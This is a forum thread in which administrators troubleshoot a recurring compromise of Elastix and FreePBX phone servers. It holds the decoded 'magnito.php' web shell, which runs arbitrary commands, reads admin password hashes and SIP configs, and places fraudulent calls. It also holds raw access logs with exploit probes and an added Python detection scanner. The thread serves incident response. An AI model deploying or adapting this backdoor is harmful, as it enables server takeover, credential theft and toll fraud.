Beware: New Elastix 2.5 / 4.0 FreePBX 2.11.0.26 exploit..

Greetings, I sent this to the "Elastix" community a week ago but nobody has answered and quite frankly I am not impressed for they don't care about anything anymore that is not their 3CX thing.

Since Issabel is a fork of Elastix 2.5 and 4.0 that still uses the core programming of the former project and also FreePBX 2.11.0.26 this is something that could potentially happen to Issabel users and I wanted to share it with you all:

POST SENT TO THE ELASTIX FORUMS:

New Elastix 2.5 FreePBX 2.11.0.26 exploit.. please help!

Greetings,

I have seen a couple of posts where users complain about a blank screen after they click on the PBX Configuration tab. Well, I have experienced the same on my server and I have all updates applied to the server both for CentOS 5.11 (defunct now according to Centos.org) and also the remaining Elastix repos on the internet.

The problem is fixed by running "yum reinstall freePBX" but sadly, it is only temporary. It looks like there is some php injection or exploit hackers have found to mess up with freePBX 2.11.0.26 (the latest Elastix installs). The intruders DELETE all php files of the freePBX GUI leaving it unusable and broken. Thank god they do not mess with the databases hence your PBX will still operate, take calls, make calls, record calls, transfer calls, register extensions and more but you won't be able to reach the GUI for further configuration until you reinstall freePBX again.

I have found myself reinstalling freePBX every single day and quite frankly this is getting on my nerves. I even set the firewall to block everything except the local network and the public IP of my customers but regardless, the intruder finds a way to break into the system and delete all php files of FreePBX.

What I found is in the /tmp folder a file called "magnito23.php", "magnito.php" or "MesSI.php". They are base64 encoded but by decoding them I realize they are obtaining admin access by retrieving the password. In addition, in the /var/www/html/_asterisk folder you will also find this "magnito.php" file which clearly means someone is injecting that code.

Oh, and it also messes with the anti hacker module!! You have to upload the license file and reconfigure it completely to make it work properly again.

I have searched for solutions on the internet to no avail. Question is... Has someone found this threat and eliminated it for good? If so, please do share because I am TIRED of reinstalling FreePBX in all my servers. Oh, and it happens on Elastix 4.0 with CentOS 7 as well. I have a mix of Elastix 2.5 and 4.0 servers and the same happens on both platforms.

Your help will be greatly appreciated.

Best Regards,

Paul D Fabre

    Could be related with this? -> https://community.freepbx.org/t/hacked-via/40670/39

    If you already closed all the external ports, then the attacker left a script in your system to trigger a script or reverse connection. Check crontab and folders for unwanted scripts. Also monitor your network and log files to know what is triggered at which time.

    navaismo I have deleted all suspicious scripts and there are no strange additions in the crontab process list.

    Reverse connection could definitely be the problem because after deleting the php files they reappear after a while.

      navaismo maybe there is a script I have not deleted yet.. also, how do I check for reverse connections?

        I have seen hacks with the magnito.php file injected in systems. Analyzing logs, it appears the attack was done to a2billing (on its version 2.2.0). We decided to not install a2billing by default as the issue we discovered is still under investigation as it seems it's a non-reported exploit.

        As for FreePBX, we are forking it on version 2.11.43, a little bit newer than the one you reported.

        Are you sure the exploit is in FreePBX code and not perhaps a2billing ?

        navaismo Reading that post thoroughly I can tell you that the reason of the problem does not apply to me because I have NO business with Sangoma or FreePBX directly. I've always been an Elastix certified Engineer and the few times (2 to be precise) I needed paid support it was through Elastix and not the Sangoma technicians which kills the possibility of any admin / ssh password leak that hackers captured from their database..

          asternic Nicolás, I have uninstalled A2Billing 2.2.0 completely on all of these affected Elastix boxes because I don't need it there but the problem persists.

          I used yum remove elastix-a2billing and made sure that nothing was left on /var/www/html related to A2Billing. Are there any other remnants of A2Billing that I probably have to look into? Because it seems that the hackers are either gaining access from the Elastix php code or FreePBX 2.11.0.26

            striderec In Elastix 2.5, updating FreePBX in any way makes the PBX Administration module show a blank screen.

              venturinog No, I'll explain again.. the page goes either blank or shows "HTTP ERROR 500 - internal Server error" AFTER the intruders gain access to the system and delete FreePBX code because if you run "amportal restart" it says it cannot find the directory where the files are located and the start process FAILS.

              After you perform "yum update elastix-freePBX" and you refresh your browser screen you will see everything back. Curiously, this intruder's script also disables the anti hacker module and you have to re-upload the license file, fill in the required fields and start the anti-hacker module once more.

                asternic One of the servers was attacked again... the magnito.php file had a base 64 encoding that I decoded and reads as follows:

                /QM149YYCS6/
                session_name("elastixSession");
                session_start();
                if ((isset($_REQUEST['md5']) && md5($_REQUEST['md5']) != '7339d7ce6b96d0dc8188e5bcc2adb8cd') || !isset($_REQUEST['md5']) && !isset($_SESSION['uid'])) {
                echo '<form action="" method="post">';
                echo '<input type="text" placehoder="./hackz" name="md5" />';
                echo '<input type="submit" value="./login" />';
                echo '</form>';
                echo '<? -- ((/my-server-public-ip-address/)) -- ?>';
                exit();
                }
                $_SESSION['uid'] = 1;
                if ($_SESSION['uid']) {
                if ($_REQUEST['web'] == 'no') {
                system($_REQUEST['cmd']);
                } else {
                include_once "/var/www/html/libs/paloSantoDB.class.php";
                include_once "/var/www/html/libs/paloSantoACL.class.php";
                $pDB = new paloDB("sqlite3:////var/www/db/acl.db");
                $db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
                $_SESSION['elastix_user'] = $db[0][0];
                $_SESSION['elastix_pass'] = $db[0][1];

                    echo '<h1 style="text-align: center; color-red">L0RD &nbsp; MAGNITO V1.0</h1>';
                    echo '<style>input,select{height: 30px; padding: 5px; font-weight: bolder;}</style>';
                    echo '<form action="" method="post">';
                    echo '<input type="text" name="context" value="asterisk-outcalls" />';
                    echo '<input type="text" name="time" value="60" />';
                    echo '<input type="text" name="prs" value="00" />';
                    echo '<input type="text" name="num" placeholder="number" />';
                    echo '<input type="submit" name="submit" value="call" />';
                    echo '</form><br />';
                    echo '<form action="" method="post">';
                    echo '<select name="cmd">';
                    echo '<option value="cat /etc/elastix.conf">elastix.conf</option>';
                    echo '<option value="grep AMPDB /etc/amportal.conf">amportal.conf</option>';
                    echo '<option value="cat /etc/asterisk/sip_additional.conf">sip_additional.conf</option>';
                    echo '<option value="cat /etc/asterisk/extensions_custom.conf">extensions_custom.conf</option>';
                    echo '<option value="ps -aux --forest">ps -aux --forest</option>';
                    echo '<option value=\'asterisk -rx "core show channels"\'>active calls</option>';
                    echo '<input type="submit" name="submit" value="exec" />';
                    echo '</form>';
                    echo '<form action="" method="post">';
                    echo '<input type="text" name="cmd" />';
                    echo '<input type="submit" name="submit" value="run" />';
                    echo '</form><br />';
                    echo '<a href="/" >Admin GO</a>';
                    echo '<hr /><pre>';
                    switch ($_REQUEST['submit']) {
                        case 'call':
                            system('asterisk -rx "channel originate Local/' . $_REQUEST['prs'] . $_REQUEST['num'] . '@' . $_REQUEST['context'] . ' application wait ' . $_REQUEST['time'] . '"');
                            break;
                        case 'run':
                        case 'exec':
                            system($_REQUEST['cmd']);
                            break;
                        default:
                            system("grep AMPDB /etc/amportal.conf");
                            break;
                    }
                }

                }
                /SRKX96EXN1WDEBU/

                  Ok, can you find any relevant lines in httpd access log?

                  Check your logs (messages, httpd, secure and dmesg); you definitely have a script triggering this, so you need to find that.

                  Also make a recursive search for the string "magnito" across your whole system; if the script exists, it is surely creating a file called magnito.
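
Added example, not part of the thread or of the Elastix/Issabel code: a plain recursive search for "magnito" matches file names and clear text, but the files were reported as base64 encoded, so this sketch also decodes embedded base64 before looking for strings taken from the decoded magnito.php above. The function names and the fixture files are assumptions made for the example; point `scan()` at directories such as /tmp and /var/www/html.

```python
import base64
import binascii
import os
import re
import tempfile

# File names reported in the thread (matched case-insensitively).
NAME_RE = re.compile(r"^(magnito\d*|messi)\.php$", re.IGNORECASE)

# Byte strings copied from the decoded magnito.php quoted in the thread.
INDICATORS = {
    "session-name": b'session_name("elastixSession")',
    "acl-lib": b"paloSantoACL.class.php",
    "acl-query": b"md5_password",
    "cmd-exec": b"system($_REQUEST",
    "banner": b"MAGNITO V1.0",
}

# A run of base64 text (line breaks allowed) long enough to hide PHP source.
B64_RUN = re.compile(rb"[A-Za-z0-9+/\r\n]{40,}={0,2}")


def decoded_layers(data, depth=0, max_depth=3):
    """Yield (depth, bytes) for the data and each base64 layer nested in it."""
    yield depth, data
    if depth >= max_depth:
        return
    for run in B64_RUN.findall(data):
        core = re.sub(rb"[\r\n=]", b"", run)
        if len(core) % 4 == 1:  # impossible base64 length: drop the stray char
            core = core[:-1]
        try:
            inner = base64.b64decode(core + b"=" * (-len(core) % 4), validate=True)
        except (binascii.Error, ValueError):
            continue
        yield from decoded_layers(inner, depth + 1, max_depth)


def inspect_file(path, max_bytes=2_000_000):
    """Return sorted reasons why a file resembles the web shell, or []."""
    reasons = set()
    if NAME_RE.match(os.path.basename(path)):
        reasons.add("name")
    try:
        with open(path, "rb") as fh:
            data = fh.read(max_bytes)
    except OSError:
        return sorted(reasons)
    for depth, layer in decoded_layers(data):
        where = "plain" if depth == 0 else "base64"
        for label, needle in INDICATORS.items():
            if needle in layer:
                reasons.add(f"{where}:{label}")
    return sorted(reasons)


def scan(roots):
    """Walk each root and map suspicious file paths to their reasons."""
    hits = {}
    for root in roots:
        for dirpath, _dirs, names in os.walk(root):
            for name in names:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                reasons = inspect_file(path)
                if reasons:
                    hits[path] = reasons
    return hits


def demo():
    """Build a throwaway tree with constructed fixtures and scan it."""
    # Constructed, harmless fixture: it carries two indicator strings only.
    fixture = (b'<?php session_name("elastixSession"); '
               b'include_once "/var/www/html/libs/paloSantoACL.class.php"; ?>')
    encoded = base64.b64encode(fixture)
    files = {
        "tmp/magnito23.php": encoded,  # reported name, encoded body
        "html/_asterisk/cache.php": b"<?php $c = base64_decode('" + encoded + b"'); ?>",
        "html/index.php": b"<?php echo 'hello'; ?>",  # benign control file
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(body)
        found = scan([root])
        return {os.path.relpath(p, root).replace(os.sep, "/"): r
                for p, r in found.items()}


if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, reasons)
```

A hit on `base64:` reasons alone, under an innocuous file name, is the case a search for the literal string would miss.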

                  venturinog Here is the /etc/httpd/logs/access.log file of yesterday June 9th, 2017:

                  146.0.243.29 - - [09/Jun/2017:00:58:20 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
                  195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /goautodial-admin/project_auth_entries.txt HTTP/1.1" 302 246 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
                  195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /agc/ HTTP/1.1" 302 209 "-" "-"
                  195.154.181.160 - - [09/Jun/2017:01:41:29 -0400] "POST /CGI/Execute HTTP/1.1" 302 216 "-" "-"
                  139.162.124.167 - - [09/Jun/2017:04:11:28 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0"
                  91.196.50.33 - - [09/Jun/2017:04:27:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
                  115.79.62.252 - - [09/Jun/2017:07:29:30 -0400] "GET / HTTP/1.1" 302 208 "-" "-"
                  180.234.24.160 - - [09/Jun/2017:07:51:48 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  180.234.24.160 - - [09/Jun/2017:07:51:50 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  146.0.243.29 - - [09/Jun/2017:08:30:37 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
                  46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET /muieblackcat HTTP/1.1" 302 217 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //pma/scripts/setup.php HTTP/1.1" 302 226 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
                  ::1 - - [09/Jun/2017:09:24:10 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  179.158.22.2 - - [09/Jun/2017:10:09:25 -0400] "GET /hndUnblock.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
                  179.158.22.2 - - [09/Jun/2017:10:09:26 -0400] "GET /tmUnblock.cgi HTTP/1.0" 302 218 "-" "Wget(linux)"
                  187.39.190.172 - - [09/Jun/2017:10:39:13 -0400] "GET /cgi/common.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
                  187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET /stssys.htm HTTP/1.0" 302 215 "-" "Wget(linux)"
                  187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET / HTTP/1.0" 302 205 "-" "Wget(linux)"
                  187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "POST /command.php HTTP/1.0" 302 216 "-" "Wget(linux)"
                  ::1 - - [09/Jun/2017:13:08:37 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  37.199.5.125 - - [09/Jun/2017:13:58:29 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  ::1 - - [09/Jun/2017:14:15:08 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  51.15.12.13 - - [09/Jun/2017:14:57:22 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 302 237 "-" "-"
                  87.181.110.35 - - [09/Jun/2017:15:53:33 -0400] "POST / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
                  217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
                  217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
                  146.0.243.29 - - [09/Jun/2017:17:41:55 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
                  45.55.11.143 - - [09/Jun/2017:20:17:43 -0400] "OPTIONS / HTTP/1.1" 400 226 "-" "-"
                  200.116.88.105 - - [09/Jun/2017:21:21:28 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 302 242 "-" "curl/7.15.5 (i386-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
                  163.172.69.33 - - [09/Jun/2017:22:01:05 -0400] "GET /recordings//theme/main.css HTTP/1.1" 302 231 "-" "curl/7.29.0"
                  163.172.69.33 - - [09/Jun/2017:22:01:07 -0400] "\x16\x03\x01" 400 226 "-" "-"
                  23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 302 205 "-" "libwww-perl/6.23"
                  213.202.233.77 - - [09/Jun/2017:22:47:51 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "-" "curl/7.29.0"
                  76.108.242.230 - - [09/Jun/2017:23:15:00 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
                  ::1 - - [09/Jun/2017:23:15:11 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  ::1 - - [09/Jun/2017:23:15:12 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  ::1 - - [09/Jun/2017:23:15:13 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  ::1 - - [09/Jun/2017:23:15:44 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 302 232 "-" "libwww-perl/6.26"
                  92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 302 216 "-" "libwww-perl/6.26"
                  47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 246 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 246 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
                  ::1 - - [10/Jun/2017:02:00:51 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  144.217.173.209 - - [10/Jun/2017:04:02:44 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  144.217.173.212 - - [10/Jun/2017:04:08:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  198.50.160.105 - - [10/Jun/2017:04:19:03 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 302 225 "-" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:43 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 302 232 "http://204.13.1.139/admin/config.php" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 302 236 "http://204.13.1.139/admin/config.php" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 302 237 "http://204.13.1.139/admin/config.php" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "/admin/index.php" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 302 321 "-" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 302 241 "-" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 302 226 "http://204.13.1.139/vtigercrm/phprint.php" "-"
                  144.217.173.209 - - [10/Jun/2017:05:04:07 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  183.129.160.229 - - [10/Jun/2017:05:06:26 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
                  144.217.173.212 - - [10/Jun/2017:05:09:51 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  198.50.160.105 - - [10/Jun/2017:05:24:54 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  190.94.141.214 - - [10/Jun/2017:05:42:12 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  190.94.141.214 - - [10/Jun/2017:05:42:15 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
                  144.217.173.212 - - [10/Jun/2017:06:16:52 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  144.217.173.209 - - [10/Jun/2017:06:19:25 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  198.50.160.105 - - [10/Jun/2017:06:38:58 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  1.205.110.99 - - [10/Jun/2017:07:21:35 -0400] "GET login.cgi HTTP/1.0" 400 226 "-" "-"
                  91.196.50.33 - - [10/Jun/2017:07:24:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:36 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:37 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:38 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:39 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:40 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
                  139.162.119.197 - - [10/Jun/2017:09:01:21 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
                  144.217.173.212 - - [10/Jun/2017:09:16:10 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  144.217.173.209 - - [10/Jun/2017:09:29:31 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  98.242.248.14 - - [10/Jun/2017:09:45:22 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
                  89.163.255.251 - - [10/Jun/2017:09:48:21 -0400] "HEAD / HTTP/1.0" 302 - "-" "-"
                  198.50.160.105 - - [10/Jun/2017:09:50:20 -0400] "GET / HTTP/1.0" 302 193 "-" "-"

                    venturinog And here is the /etc/httpd/logs/ssl_access.log file for yesterday, June 9th, 2017:

                    13.58.12.77 - admin [09/Jun/2017:16:00:50 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:01:43 -0400] "POST / HTTP/1.1" 200 5409
                    51.15.52.242 - - [09/Jun/2017:16:02:08 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    51.15.52.242 - - [09/Jun/2017:16:02:11 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    87.181.110.35 - - [09/Jun/2017:16:03:44 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:05:46 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:07:46 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:09:47 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:11:48 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:13:49 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:15:50 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:17:51 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:19:52 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:21:52 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:23:38 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:23:53 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:25:38 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:25:54 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:27:39 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:27:54 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:29:40 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:29:55 -0400] "POST / HTTP/1.1" 200 5409
                    188.161.115.236 - - [09/Jun/2017:16:30:50 -0400] "GET /a2billing/ HTTP/1.1" 404 208
                    99.64.248.239 - - [09/Jun/2017:16:31:40 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:31:56 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:33:41 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:33:57 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:35:42 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:35:58 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:37:42 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:37:58 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:39:43 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:39:59 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:41:43 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:42:00 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:43:43 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:44:01 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:45:44 -0400] "POST / HTTP/1.1" 200 5409
                    51.15.52.242 - - [09/Jun/2017:16:45:59 -0400] "GET / HTTP/1.0" 400 362
                    51.15.52.242 - - [09/Jun/2017:16:46:00 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
                    87.181.110.35 - - [09/Jun/2017:16:46:01 -0400] "POST / HTTP/1.1" 200 5409
                    51.15.52.242 - - [09/Jun/2017:16:47:37 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    51.15.52.242 - - [09/Jun/2017:16:47:38 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    99.64.248.239 - - [09/Jun/2017:16:47:44 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:48:02 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:49:44 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:50:02 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:51:45 -0400] "POST / HTTP/1.1" 200 5409
